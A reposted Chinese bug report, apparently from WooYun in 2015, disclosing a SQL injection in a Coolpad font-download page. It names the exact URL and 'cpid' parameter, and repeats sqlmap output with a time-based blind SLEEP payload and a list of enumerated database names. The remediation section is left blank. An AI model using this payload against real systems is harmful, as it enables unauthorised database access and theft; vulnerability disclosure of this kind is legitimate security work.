记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

酷派某站SQL注入2

2015-02-24 21:40

http://coolshow.coolyun.com/service/fontdl.php?channel=0&cpid=2928925714&id=292892571

4&type=0

cpid参数

code 区域
sqlmap identified the following injection points with a total of 103 HTTP(s) req

uests:

---

Place: GET

Parameter: cpid

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: channel=0&cpid=2928925714' AND SLEEP(5) AND 'hbrz'='hbrz&id=2928925

714&type=0

---

[20:51:38] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.13

back-end DBMS: MySQL 5.0.11



databse

code 区域
[20:52:11] [INFO] retrieved: information_schema

[20:54:06] [INFO] retrieved: db_yl_androidesk

[20:55:50] [INFO] retrieved: db_yl_elflockscreen

[20:59:17] [INFO] retrieved: db_yl_keyguard

[21:01:43] [INFO] retrieved: db_yl_themes

[21:04:32] [INFO] retrieved: db_yl_themes_records

[21:10:00] [INFO] retrieved: db_yl_widget_image

[21:15:30] [INFO] retrieved: db_yl_widget_records

。。。

漏洞证明:

code 区域
sqlmap identified the following injection points with a total of 103 HTTP(s) req

uests:

---

Place: GET

Parameter: cpid

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: channel=0&cpid=2928925714' AND SLEEP(5) AND 'hbrz'='hbrz&id=2928925

714&type=0

---

[20:51:38] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.13

back-end DBMS: MySQL 5.0.11



databse

code 区域
[20:52:11] [INFO] retrieved: information_schema

[20:54:06] [INFO] retrieved: db_yl_androidesk

[20:55:50] [INFO] retrieved: db_yl_elflockscreen

[20:59:17] [INFO] retrieved: db_yl_keyguard

[21:01:43] [INFO] retrieved: db_yl_themes

[21:04:32] [INFO] retrieved: db_yl_themes_records

[21:10:00] [INFO] retrieved: db_yl_widget_image

[21:15:30] [INFO] retrieved: db_yl_widget_records

。。。

修复方案:

。。


知识来源: www.wooyun.org/bugs/wooyun-2015-090917

阅读:123352 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“酷派某站SQL注入2”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词